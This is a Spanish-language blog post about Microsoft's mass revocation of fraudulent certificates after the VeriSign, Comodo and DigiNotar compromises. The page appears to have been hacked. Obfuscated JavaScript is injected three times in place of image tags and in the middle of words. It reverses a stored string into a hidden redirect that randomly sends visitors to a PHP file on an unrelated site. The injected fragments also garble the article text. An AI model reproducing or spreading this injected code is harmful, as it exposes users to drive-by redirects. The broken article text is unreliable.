Actualizacion de Microsoft con revocación masiva de certificados
Hoy Microsoft ha publicado en forma de actualización automática su
tercera revocación masiva en 10 años… y la segunda de 2011. Y no
solo ha avanzado en número sino en “calidad” de las revocaciones. El
incidente del compromiso de DigiNotar ha disparado las dudas sobre el
funcionamiento PKI. Y lo peor es que parece que lo interesante está
por llegar.
VeriSign, la empresa líder en emisión de certificados para Internet,
protagonizó en marzo de 2001 uno de los fiascos más importantes de su
historia. Emitieron dos certificados a un impostor que se hizo pasar por
trabajador de Microsoft. Esto hubiera permitido, por ejemplo, firmar
programas o cualquier software malicioso como si fueran aplicaciones
originales de Microsoft. McAfee y Symantec se apresuraron en anunciar
que sus antivirus cuentan con actualizaciones para detectar los
certificados fraudulentos, como si de un virus se tratara. Los
certificados fueron revocados en la actualización de Microsoft MS01-017.
El origen del fallo fue el protocolo de validación, usando la ingeniería
social.
Este era el aspecto por defecto (hasta marzo de 2011) del manejador de
certificados de cualquier Windows (ejecutar certmgr.msc en la línea de
comandos):
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio/images/noticias/cert1.png” alt=”” width=”1013″ height=”237″ /></p>
<p>Marzo 2011. Comodo</p>
<p>Comodo reconoció que un atacante con IP de Irán se hizo con usuario y<br />
contraseña de una au<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
toridad secundaria de Comodo en el sur de Europa.
El atacante utilizó estos datos para hacerse pasar por esa autoridad
secundaria y emitir certificados fraudulentos de páginas como
login.live.com, mail.google.com, www.google.com, login.yahoo.com,
login.skype.com, addons.mozilla.org…
Si en la ocasión anterior se revocaron certificados de firma de código,
era la primera vez que se hacía una revocación masiva de certificados
SSL y a nivel de dominios importantes.
Este era el aspecto por defecto (hasta septiembre de 2011) del manejador
de certificados de cualquier Windows:
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio/images/noticias/cert2.png” alt=”” width=”1008″ height=”284″ /></p>
<p>Septiembre 2011. DigiNotar</p>
<p>Al parecer, el mismo intruso que consiguió emitir los certificados<br />
fraudulen<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tos de Comodo, compromete por completo la compañía DigiNotar
(de Vasco) y se detectan certificados de decenas de dominios
importantes. La “calidad” de la revocación aumenta, y no sólo se
invalidan certificados concretos por “fraudulentos” sino a la entidad
entera (sus certificados raíz) por “no confiables”. El atacante entró
hasta el último recodo de la empresa.
Este es el aspecto del manejador de certificados de cualquier Windows
actual:
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio/images/noticias/certfraud.png” alt=”” width=”1078″ height=”368″ /></p>
<p>Futuro…</p>
<p>Rota por comple<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to la confianza en DigiNotar, probablemente desaparezca
o, como se suele hacer, cambiará de nombre para intentarlo de nuevo.
GlobalSign, otra importante empresa certificadora, acaba de confirmar
que ha sufrido una intrusión.
El atacante iraní que afirma ser el autor del compromiso de DigiNotar,
también asegura tener acceso a otras entidades certificadoras y la
posibilidad de emitir nuevos certificados falsos.
Aunque PKI esté concebida para sufrir este tipo de revocaciones
ocasionales, el hecho de que se utilicen con tanta asiduidad merma la
confianza en el modelo. Además en dispositivos móviles, por ejemplo,
cada vez más utilizados para navegar, no es tan sencillo actualizar y
revocar certificados…
Habrá que estar atentos.
Fuente
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.